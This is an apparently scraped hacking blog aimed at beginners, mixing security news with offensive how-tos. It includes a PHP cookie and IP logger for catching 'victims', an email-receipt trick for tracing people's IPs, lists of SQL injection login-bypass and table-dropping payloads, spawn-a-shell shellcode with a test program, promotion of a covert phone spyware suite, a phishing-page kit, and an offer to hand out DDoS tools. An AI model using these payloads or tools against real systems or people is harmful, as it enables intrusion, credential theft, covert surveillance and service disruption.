Hackers Bay: General

Showing posts with label General. Show all posts

Hacker Used SQL-injection to Get 675K Credit Card

A computer hacker from Georgia has pleaded guilty to fraud and identity theft after authorities found him with more than 675,000 stolen credit card accounts on his home computers, Credit card companies have traced more than $36 million in fraudulent transactions to the accounts that were breached by Rogelio Hackett.

How he did it? Hacker briefly used the SQL-injection attack on web resources he was able to use different SQL vulnerabilities despite that this kind of vulnerability is well known. SQL injection is one of the popular attacks on web application’s backend database it is not like XSS vulnerability where attacker uses JavaScript to target the client browser, SQL injection targets the SQL statement being executed by the application on the backend database.

Hackers usually identify the SQL injection vulnerability by adding invalid or unexpected characters to a parameter value and watch for errors in application’s response. For example:

http://www.example.com/users.asp?id=mark’

If the request generates an error, it is a good indication of a mishandled quotation mark and the application may be vulnerable to SQL injection attacks. While I think that automated tools can do fast job in checking these vulnerabilities such as Havij a very fast tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

Attack with SQL-code uses poorly written Web-based applications that directly write data into the database. In fact, SQL-injection does not depend on application language as mistakes in programming allow SQL-injection use almost any programming language.

That’s why it is very important to conduct Application black-box penetration testing as this can reveal OWASP Top 10 application vulnerabilities, including SQL injection, parameter manipulation, cookie poisoning, and XSS.

An attacker who wishes to grab usernames and passwords might try phishing and social engineering attacks against some user’s application. On the other hand, Hackers can try to pull everyone’s credentials directly from the database.

Hacking A Biometric System

Description: This paper was presented in NullCOn 2011
"Penetration Testing Biometrics Systems "

You could read the detailed paper by following the below mentioned links.

PDF version: http://www.fb1h2s.com/Null_Biometrics.pdf

HOW TO GET IP ADRESS EASILY

I have been getting requests that the content we are posting is not easy for beginners.I was little disappointed with such review so here we go simple yet effective post about very basic of intenet,networking the IP-address.

What is an IP address?
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like 112.123.123.121(etc this is example of ipv4)

What can be done with an IP address?

IP adress is the very basic unit before you start a hack its basically used for fingerprinting,tracing and if victim is weak it wont take 10 secs to penetrate through vulnerability :)

HOW can I get an IP address?

Its an easy task to get your aswell as others ip addresses
to get your own ip address just go to this website

How to get ip of a website?

go to shell(command prompt) just type ping www.target.com
and there it will start showing numeric just like in this picture

How to get IP address of friends or victims?

Using E-mail receipts

E-mail receipt is a kind of notification you get as an e-mail when someone open (reading the mail send by you) your mail.

This notification consist of

IP address of the mail reader.
Time and date of reading the mail.
Name and version of his browser.

You need to follow these steps

a. Step 1:-

Visit readnotify and signup there. You can use your gmail, yahoo, hotmail,rediff or any email id. They give free trials for 2 weeks or 25 emails whichever comes first.

b. Step 2:-

Let's say you have used your email id example@gmail.com to register on readnotify.com, than login to your email account first.

c. Step 3:-

Click on the Compose mail menu and in the To : section write the email id of the culprit followed by readnotify.com, so the complete email address would be like victim@gmail.com.readnotify.com.
just the normal procedure of email

step 4
you are done just wait for the victim to open that email volla you will get the details.

Using php scripts

here is the basic php script

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.' IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.' ');
fclose($fp);
header ("Location: http://google.com/")
?>

Process:save it in you hosting ripway,my3gb,blackapplehost etc dont forget to create a file.txt file which will save all the ips

This will save ips with date,time,from where link came+u can redirect to another url just like i redirected to google in matter of seconds.

Upcoming post will be on fingerprinting with ip address so we can work with a flow.

Do share you views on this post i tried to keep it simple.

WEAKERTHAN LINUX FOR HACKERS

Most of you would have heard about backtrack but its not the only one in the business.Weakerthan is another linux based pentesting distro which is really good..Weakerthan is my second favorite after backtrack

Intro:

WeakNet Linux is designed primarily for penetration testing, forensic analysis and other security tasks. The default desktop environment is GNOME.

The tools i have selected are tools we use all the time here, as i said, If you find some that you want in it, please let me know. The image is about 1GB meaning; It will have to be on DVD, meaning; I can't host it here without risk of bandwidth dying! I need a place to upload it to. Some code written by WeakNet Labs Assistants from this site that are preinstalled:

* BRuWRT-FORSSE v2.0
* Easy-SSHd
* Web-Hacking-Portal v2.0
* Perlwd
* Netgh0st v3.0
* YouTube-Thief!
* Netgh0st v2.2
* DomainScan
* ADtrace
* Admin-Tool
* Tartarus v0.1
* and much more..

really good GUI+vulnerable applications to test our hacking skills

my personal experience with weaknet was really good & its worth.

WEAKERTHANv2 WeakNet Linux 5 - ISO ~684MB
WeakNet Linux Complete Administration Guide

WHAT IS LINUX

As you move in this world of hacking.You will realise the importance of linux for hackers,programmers,geeks.

I wont go in deep here in hackersbay for more tutorials&functioning of linux you can refer to our sister site

What exactly is linux&its importance

Linux is an operating system based on unix.Some other common operating systems are Unix (and its variants BSD, AIX, Solaris, HP-UX, and others); DOS; Microsoft Windows; Amiga; and Mac OS.

Linux was originally created by Linus Torvalds with the assistance of developers from around the globe. Linux is free to download, edit and distribute. Linux is a very powerful operating system and it is gradually becoming popular throughout the world.

World's fastest supercomputer uses linux so you can realise how powerful linux can be.

Linux is free operating system not like windows where you have to pay thousands of $$ costing half of the hardware of pc.Linux is an open source means anyone can edit it legally as per his/her convenience.

There are many distributions of linux available -ubuntu, madvira, fedora, open suse, mint etc

But desktop market 7-15% bcuz its not easy to use it..but once u get habit of it i bet ull spit on windows

Advantages Of linux

1) BETTER SECURITY THAN WINDOWS -- Nowadays you can easily see windows remote exploit flying around.Yes windows is easy to attack as compared to linux.

2)RESOURCES AVAILABLE BY DEFAULT-many software addons drivers are already installed on it

3)GOOD FOR HACKING - There are distributions specially designed for hackers backtrack,weaknet,blackbuntu,secmic etc

4)ITS FREE NOT LIKE WINDOWS (WHO WILL PAY THOUSANDS OF $$ )
the only linux which costs some pennies is redhat.

5)LIVE CD-One of the best feature you can run it without evan affecting your hd

DISADVANTAGES

1)NOT MANY S/W companies supporting linux based softwares

2)NOT EASY AS WINDOWS --Its command based,&requires tweaking.

3)EXE SUPPORT-basic extension exe is not supported but you can run them via WINE

What for beginners?where to start from

Well i would suggest ubuntu(only linux for humans) as it has largest community support so if you have any problem it could be easily resolved easily and its much user friendly linux

grab these 2 books linux bible&ubuntu unleashed.These books have good data for linux and ubuntu if you want to learn linux more deeply.

for linux tweaks and tutorial we wont post them on hb u can find them on basicgeeks.com

upcoming updates:linux distributions for hackers :)

Do share the post with your friends.

Websecurify Security Testing Framework

Websecurify is a powerful web application security testing platform designed from the ground up to provide the best combination of automatic and manual vulnerability testing technologies.

Some of the main features of Websecurify include:

Available for all major operating systems (Windows, Mac OS, Linux)
Simple to use user interface
Built-in internationalization support
Easily extensible with the help of add-ons and plugins
Exportable and customisable reports with any level of detail
Moduler and reusable design
Powerful manual testing tools and helper facilities
Powerful analytical and scanning technology
Scriptable support for JavaScript and Python
Extensible via many languages including JavaScript, Python, C, C++ and Java

You can download Websecuify here

QuickRecon: Simple Information Gathering Python Script

QuickRecon is a simple information gathering tool, that allows you to:

Find subdomain names
Perform zone transfer
Gather emails from Google.com and Bing.com

For those unknown, DNS zone transfer, is a type of DNS transaction that allows us to replicate the databases containing the DNS data across a set of DNS servers. Zone transfer comes in two flavors, full (opcode AXFR) and incremental (IXFR). AXFR stands for Asynchronous Full Transfer Zone and IXFR stands for Incremental Zone Transfer. This simple Python script depends on DNS toolkit ‘dnspython‘ while performing a zone transfer.

The e-mail gathering feature of this tool can also be used in a lot of ways – to learn about possible targets for account brute force, social engineering, etc.

The best part about this script is that it is cross compatible with multiple operating systems. It has been successfully tested on Windows XP and BackTrack 4 R2 with a Python 2.x installation.

Sample usage:

Obtaining subdomain names (built-in dictionary):
python quickrecon.py -m s -d example.com -o out.log

or (an external dictionary):
python quickrecon.py -m s -d example.com -i your_subdomains.txt

Zone Transfer:
python quickrecon.py -m z -d example.com

Gathering emails from Google.com and Bing.com:

python quickrecon.py -m e -d example.com -o out.log
python quickrecon.py -m e -d example.com -l 500

(quickrecon-0.2.zip) here.

Trojan to Disable Cloud-Based Antivirus--BOHU

A recent blog entry from the Microsoft Malware Protection Center details information about a new malware (called Win32/Bohu.A) which is specifically designed to disable and mislead cloud-based antivirus software.
Cloud-based antivirus software differs from traditional antivirus software in that the antivirus client (running on the PC) sends important threat data to a server for backend analysis, and subsequently receives further detection and removal instruction.

The Bohu Trojan originates in China where there is a predominate use of cloud-based antivirus software. Once a Windows based machine is infected the malware installs different network level filters to disrupt and block the antivirus client accessing the backend antivirus services on the Internet.
As well as writing random data at the end of its key payload components to avoid hash-based detection, Bohu also installs a Windows Sockets service provider interface (SPI) filter to block the antivirus network traffic as well as a Network Driver Interface Specification (NDIS) filter. The NDIS filter then stops the antivirus client from uploading data to the server by looking for the server addresses in the data packets.

WordPress Releases Security Hardening Update

The WordPress project has announced the releases of WordPress 3.0.5. Dubbed as a security hardening release it is an essential update for those with any untrusted user accounts, but it also comes with other important security enhancements and hardening for all WordPress installations.
Two cross site scripting bugs have been squashed:

Properly encode title used in Quick/Bulk Edit, and offer additional sanitization to various fields. Affects users of the Author or Contributor role.
Preserve tag escaping in the tags meta box. Affects users of the Author or Contributor role.

Also included in 3.0.5 are two security enhancements one of which improves the security of any plugins which were not properly leveraging the WordPress security API.
All WordPress administrators are encouraged to upgrade to this latest version. You can update automatically from the Dashboard > Updates menu in your site’s admin area or download 3.0.5 directly

WhatWeb-Next Generation Web Explorer

Introduction

Identify content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries, servers and more. When you visit a website in your browser the transaction includes many unseen hints about how the webserver is set up and what software is delivering the webpage.
Some of these hints are obvious, eg. “Powered by XYZ” and others are more subtle. WhatWeb recognises these cues and reports what it finds.

WhatWeb has over 250 plugins and needs community support to develop more. Plugins can identify systems with obvious identifying hints removed by also looking for subtle clues. For example, a WordPress site might remove the tag but the WordPress plugin also looks for “wp-content” which is less easy to disguise. Plugins are flexible and can return any datatype, for example plugins can return version numbers, email addresses, account ID’s and more.

There are both passive and aggressive plugins, passive plugins use information on the page, in cookies and in the URL to identify the system. A passive request is as light weight as a simple GET / HTTP/1.1 request. Aggressive plugins guess URLs and request more files. Plugins are easy to write, you don’t need to know ruby to make them.

Example Usage

i tested simple command on our sister site www.basicgeeks.com and result was good

Log Output

There are currently 3 types of log output. They are:
–log-brief Brief logging. Default output
–log-full Full logging. Complete output from each plugin
–log-xml XML logging. Same information as default output but in XML format
You can output to multiple logs simulatenously by specifying muliple command line logging options.

you can download whatweb here

What Is Ddos Attack And How Does It Work?

What Is Ddos Attack And How Does It Work?

Many of people in illusions that Website hacking and Attacking is very Difficult and only some hackers and professionals can Do It... Now that's absolutely wrong thinking... Its as Easy as alphabetic.

First of all We all should know What are the Different Methods Of attacking Websites...
There are Generally Three Methods of Attacking an Website...

1. Ddos Attack
2. Shell Scripts Attack

3. Javascript Attack or Attack through Scripting.

Note: SQL and other techniques comes in the Hacking Websites Part Not in attacking Part. Attacking is simply for fun or intentionally causing damage to the Website..

Ddos Attack

What is a Distributed Denial of Service (DDoS) attack?

Have you ever tried to make a telephone call but couldn't because all the telephone circuits were busy? This may happen on a major holiday and often happens on Diwali,New year etcc.

The reason you couldn't get through is because the telephone system is designed to handle a limited number of calls at a time.

So upto now you will Got an Idea What is Ddos(Distibuted Denial of Service) Attack.
Basically Ddos attack is an attack which makes the Network So congested such that no further Requests are delivered.

This is Done by making a number of connections to the Websites through Different Computer or Networks. Also can be done from One Computer by making Connections through Different Ports as there are 64k ports available in Windows OS.

How Attacker Launch a Ddos Attack?

Over past years Denial of service attack has made huge amount of damage,Many of the have been victimed of this attack

Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.

This attack also recently hit twitter on 6th August 2009,lot of people had trouble on logging on twitter,It was brought down by denial of service attack,They tired up there server so no one can get on log on it.Websites like facebook, eBay etc have also been victim of this attack.

First, Attackers build a network of computers that will be used to produce the volume of traffic needed to deny services to computer users. We'll call this an "attack network".

To build this attack network, Attackers look for computers that are poorly secured, such as those that have not been properly patched, or those with out-of-date or non-existent anti-virus software. When the Attackers find such computers, they install new programs on the computers that they can remotely control to carry out the attack.

These days, however, the process of building an attack network has been automated through self-propagating programs. These programs automatically find vulnerable computers, attack them, and then install the necessary programs. The process begins again as those newly compromised computers look for still other vulnerable computers.

Once an attack network is built, the intruder is ready to attack the chosen victim or victims. Some information security experts believe that many attack networks currently exist and are dormant, passively waiting for the command to launch an attack against a victim's computers. Others believe that once a victim has been identified, the attack network is built and the attack launched soon afterward.

So guys i think this is enough for today hope you all now familer with Ddos attack in future post will we show how to do Ddos attacks with various hacking tools like Serve Attack Pro and LOIC (Low Orbit Ion Cannon) and other exploits.

and if you want to try ddos then comment here and tools wil b delievr to your inbox

Make Your Own Anonymous Email Service

Do you want to send an email anonymously because, for example, you fear your views might not be appreciated by your boss? When avouching your opinion in public — critically important under more favorable circumstances — is unhealthy, anonymity becomes vital. Here i will show you how to setup your own anonymous email service. I am writing this post because there are some things that must be said, even when the speaker must remain anonymous. Lets start:

1) First of all you need to find a free hosting service that supports PHP and SendMail. Here is one that works perfect, and without ads: x10hosting.com. Create an account there.

2) Now open notepad and paste this PHP code: the code

because of some reason i am not going to give code here just write your email in comment and code will be sent in your mail

3) Save it everywhere u want as mail.php, then upload it in your host you created (x10hosting) via FTP.

4) Now we are done. Just go at yourname.x10hosting.com/mail.php, and start sending your fake emails.

Why sending anonymous emails is important:

* Anonymously report sensitive information to the media

* Send crime tips to law enforcement agencies anonymously

* Report wrongdoing or theft at the workplace

* Voice concerns to school principals anonymously

* Report child or any other abuse

* Initiate an anonymous chat discussion

* Share suspicions regarding a friend or loved one

What Is SQL Injection & How Does It Work

What Is SQL Injection & How Does It Work

SQL injection is most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that exposes unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly filtered for embedded SQL statements.

SQL injection vulnerabilities have three forms:

Incorrectly filtered special characters: escape characters

This form of SQL injection occurs when the user manipulates the SQL statements using characters such as ’. For instance consider that you need to enter username and password while logging into your account. The SQL statement generated will be:
“SELECT * FROM users WHERE password = ’” + password + “‘;”

Now suppose the userName and/or password so entered are” ‘ or ‘1’=’1”. So the SQL statement reaching the back end will be:

“SELECT * FROM users WHERE password =’ ‘or ‘1’=’1 ‘;”

Look closely at this statement. It is deciphered by the database as select everything from the table “user” having field name equal to ‘ ‘ or 1=1. During authentication process, this condition will always be valid as 1 will always equal 1. Thus this way the user is given unauthorized access.

List of Some Important inputs used by hackers to use SQL Injection technique are:
a) ‘ or ‘a’=’a
b) ‘ or 1=1 –
c) ‘ or 1=1; –
d) ‘; select * from *; –
e) ‘ (Single quote)(Here we look at the error)
f) ‘; drop table users –

On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of “username” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “data” table (in essence revealing the information of every user):
a’;DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%

Incorrectly handling input data type

This form of SQL injection occurs when the user input is not strongly typed i.e. , the input by the user is not checked for data type constraint. For example consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, therefore the input must be checked whether it is numeric or not. If not checked, then the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:
“SELECT * FROM user WHERE telephone = “+ input +”;”
Now if I can input alphanumeric data say “11111111;DROP TABLE user” then I have embedded an SQL statement to delete the entire table “user”. This might prove detrimental to the company!!!

If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:

1. ‘ having 1=1 –
2. ‘ group by user.id having 1=1 –
3. ‘ group by users.id, users.username, users.password, users.privs having 1=1—
4. ‘ union select sum(users.username) from users—
5. ‘ union select sum(id) from users –

Vulnerabilities inside the database server

Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server’s real_escape_chars() functions.
If the database server is not properly configured then the access to the database can easily be found out by the hacker.
The hacker can get information regarding the database server using the following input:
‘ union select @@version,1,1,1—

1. Extended Stored Procedure Attacks
2. sp_who: this will show all users that are currently connected to the database.
3. xp_readmail, , , , ,@peek=’false’ : this will read all the mails and leave the message as unread.

In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in software application at the database layer.

So guys I think now you should absolutely aware of what SQL injection is so in my next post we will discus how to hacks website' database or website form this method.

What is exploit and how to use it?

What is an exploit

An exploit is a computer programm, which circumvent computer security. There are many ways to exploit security holes. If a computer programmer make a programming mistake in a computer program, it is sometimes possible to circumvent security. The coding of such programs, which attack (hack) the programming mistakes or security holes is the art of exploitation or exploit coding. Some common exploiting technics are stack exploits, heap exploits, format string exploits, ...

What is an stack exploit

A stack exploit occurs, if you can write more than the size of a buffer located on the stack into this buffer. If you can write more data, as the size of the buffer (more than 1024 bytes in this example) a stack overflow occurs. For example:

main(int argc, char **argv)
{
// This buffer is located at the stack
char buf[1024];
// i is located on the stack
int i;

// A 6 byte stack buffer overflow
for(i=0;i<1030;i++) buf[i] = 'A' // Another example // if argv larger than 1024 a overflow occur strcpy(buf, argv[1]); } Why a stack overflow is a security threat ? The assembler instruction 'call' push the return address on the stack. 'call' jump into a function in our example the function is main. If the function returns with the assembler instruction 'ret', it returns to the function pointer at the stack. If you can overflow the stack you can overwrite the return address located at stack. You can return to another location. The location should a pointer to a shellcode address. Read alephonestack.txt for more information. You can download it at my papers section. What is a shellcode

Shellcode are machine instructions, which launch a shell for example. A shellcode looks like this:

char shellcode[]="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62 \x69\x89"
"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\ xcd\x80";

Every char is a machine instruction. \xcd\x80 is 'int 80' for example. After an overflow occur we need a address to return. This shellcode launch a shell. If you point to the shellcode (after a stack overflow for example), the machine instructions are launched and spawns a shell. Compile this program. It tests the shellcode and spawns a shell:

// Compile this program with gcc sctest.c -o sctest and start it: ./sctest
// now you have someting like
// sh-2.03$

#include

char shellcode[]=
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\ x69\x89"
"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\ xcd\x80";
int
main()
{
void (*dsr) ();
(long) dsr = &shellcode;
printf("Size: %d bytes.\n", sizeof(shellcode));
dsr();
}

read alephonestack.txt for basic shellcode coding

What are heap overflows

If the heap is overflowed a heap buffer overflow occurs.
A heap overflow looks like that:

// It dynamically create a 1000 byte buffer on the heap.
main(int argc, char **argv)
{
// pointer points to a heap address
char *pointer = malloc(1000);
char *pointer2 = malloc(200);

// Overflowed, if argv[1] is larger than 1000 bytes.
// The buffer pointer 2 is overflowed if pointer
// contains more than 1000 bytes.
strcpy(pointer, argv[1]);

// Free dynamically allocated data
free(pointer)
free(pointer2);
}

Format String exploit's ?

If you control the format string in one of the printf, syslog or setproctitle function, a exploitation is possible. Format strings are something like "%s", "%x", "%d", ... For example:

main(int argc, char **argv)
{
char *buf = "TEST";

// The wrong way
// The user can control the format string
printf(argv[1]);

// You should code:
printf("%x", argv[1]);
}

Facebook unveils security tools after Zuckerberg's page hacked

Facebook today announced two new security measures -- wider use of HTTPS and the introduction of "social authentication" -- less than 24 hours after the Facebook page of company founder Mark Zuckerberg was defaced by a hacker.

A blog post by Facebook's Alex Rice ties the security announcement to Friday being "Data Privacy Day," but the press and bloggers are having a high time connecting the news and Zuckerberg's victimization, whether or not there is actually any connection.

The first new security measure involves expanding the use of HTTPS -- Hypertext Transfer Protocol Secure -- beyond password exchanges.

Rice writes: "Starting today we'll provide you with the ability to experience Facebook entirely over HTTPS. You should consider enabling this option if you frequently use Facebook from public Internet access points found at coffee shops, airports, libraries or schools. The option will exist as part of our advanced security features, which you can find in the 'Account Security' section of the Account Settings page."

The second measure is a captcha-like authentication mechanism that instead of relying on illegible printed words employs photographs of a Facebook user's own friends.
Rice continues: "Instead of showing you a traditional captcha on Facebook, one of the ways we may help verify your identity is through social authentication. We will show you a few pictures of your friends and ask you to name the person in those photos. Hackers halfway across the world might know your password, but they don't know who your friends are."
Meanwhile, Facebook has remained officially mum regarding yesterday's apparent hacking incident that saw someone insert a message onto Zuckerberg's Facebook fan page, which has attracted 2.8 million Facebook users. While it was removed relatively quickly, some 1,800 of those users managed to "like" the page and more than 400 left comments beforehand. The message read:
"Let the hacking begin: If facebook needs money, instead of going to the banks, why doesn't Facebook let its users invest in Facebook in a social way? Why not transform Facebook into a 'social business' the way Nobel Price [sic] winner Muhammad Yunus described it? #hackercup2011"

As of this writing, Zuckerberg's page remains disabled.

How Antivirus Software identifies threats

Most of us are aware how Antivirus Works and updates. As ever increasing threat from virus and other malicious programs, almost every computer today comes with a pre-installed antivirus software on it. In fact, an antivirus has become one of the most essential software package for every computer. Even though every one of us have an antivirus software installed on our computers, only a few really bother to understand how it actually works and updates.

An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs.

1. Signature-based detection – Dictionary based
2. Heuristic-based detection – Suspicious behavior based

1. Signature-based detection – Dictionary based

This is the most commonly employed method which involves searching for known patterns of virus within a given file. Every antivirus software will have a dictionary of sample malware codes called signatures in it’s database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within it’s database and compares the same with the current file. If the piece of code within the file matches with the one in it’s dictionary then it is flagged and proper action is taken immediately so as to stop the virus from further replicating. The antivirus may choose to repair the file, quarantine or delete it permanently based on it’s potential risk.

As new viruses and malwares are created and released every day, this method of detection cannot defend against new malwares unless their samples are collected and signatures are released by the antivirus software company. Some companies may also encourage the users to upload new viruses or variants, so that the virus can be analyzed and the signature can be added to the dictionary.

More and regular the updates more secure we are.

2. Heuristic-based detection Suspicious behavior based

Heuristic-based detection involves identifying suspicious behavior from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus software’s to identify new malware and variants of known malware. Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.

File emulation- This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.

How to check your anti virus weather it does the work you haired it for?

European Institute of Computer Antivirus Research – EICAR Test makes it easy. It is a common test and most of us can perform it right now!
1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.
EICAR Test Code:
1

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

2. Rename the file from New Text Document.TXT to mynewfile.com
3. Now run the antivirus scan on this mynewfile.com file.

If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise find a new one.

Backtrack vs Windows 7

I was watching some video presentations and luckily i found this one :)
this is vocal difference between windows 7 vs backtrack a bit on funny side but worth watching...

Hyenae: A Platform Independent Network Packet Generator

Hyenae is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant.

Hyenae can be used to reveal potential security vulnerabilities of your network. Besides smart wildcard-based address randomization, a highly customizable packet generation control, and an interactive attack assistant, Hyenae comes with a clusterable remote daemon for setting up distributed attack networks.

Hyenae used by security experts to protect their own networks by attack our their networks before someone else does. This tool can be used to evaluate new security devices how it reacts on different types of attacks. For POC of different web applications , network application, database applications and other customized application of your environment.
In small words Hyenae ca be used for stress test of different applications and devices.

note:this tool might look like just another tool but dont go on looks its really powerful and elastic

Download Hyenae v0.36-1 (hyenae-0.36-1.tar.gz/hyenae-0.36-1_fe_0.1-1-win32.exe) here.

Phone Creeper: A Windows Phone Espionage Suite

For some time now, there were spy apps for Symbian phones and BlackBerry’s too! Surprisingly, there none for the Windows Mobile operating system. More so, because applications like these are sold for a fee. Phone Creeper will change it all!

Phone Creeper is a phone espionage suite that is being actively developed for sometime now. It can be silently installed by just inserting an SD card with the files included in the package. As is the requirement of all spy tools, the program does not show up under installed programs or running programs and allows for a useful array or features. Best of all, phones running this software can be remotely controlled by text messages! This could ensure a longer battery life as it does not need bluetooth or infrared connection. Plus, with BT and IR, you need to be in a fixed radius to get best results. Yes, this does add to the text messaging costs and if the user were to grow suspicious with rising bills, chances are that this tool could be removed from the phone. But, worry not! By default, this program will silently reinstall itself even after a hard reset, if the memory card with these files is still in the device. If only the memory card is not formatted, this feature will help us a lot!

All commands will be silently received and deleted immediately and results will be issued back to sender. Pre-configured settings can be added to the installer to have your own default password and phone number to receive live updates. It does all the normal spy stuff – get phone records, get GPS info etc.

These are the commands that you can possibly use to err spy on some one:

The mother of all commands:

password FTPgetcalllogs - To receive any log by FTP, you can pre-seed any get com
By default, the password is set to the creators name – chetstriker. So, you will have to reset it to something of your choice before actively using it.

If only there was a command to stop the text messaging counter to be fixed to a certain number!  I have never used a Windows Mobile and so this was a first for me when I got to know that the WM phone has FTP too!

If you infect yourself by accident, the author has been gracious enough to provide a Phone Creeper uninstaller too!

Download Phone Creeper v0.98 (PhoneCreeper_V0.98.cab) and it’s uninstaller (RemoveCreeper.zip) here.

Social Engineering Ninja – PHP scripts

S-E Ninja is a Social Engineering tool, with 20-25 popular sites fake pages and anonymous mailer via mail() function in PHP.

Sites included:
amazon.com
digg.com
ebuddy.com
facebook.com
gmail.com
hotmail.com
msn.com (hotmail)
myspace.com
onecard.com (AR,EN Langs)
paypal.com
travian.com (AR,EN Langs)
twitter.com
yahoo.com
youtube.com
xboxlive.com
hotfile.com

features:
popular phishing pages
IP catcher with redirection
Public browser exploitation
Anonymous email sender

Download Social-Engineering Ninja V0.4 (SEN-V0.4.rar) here

Hackersbay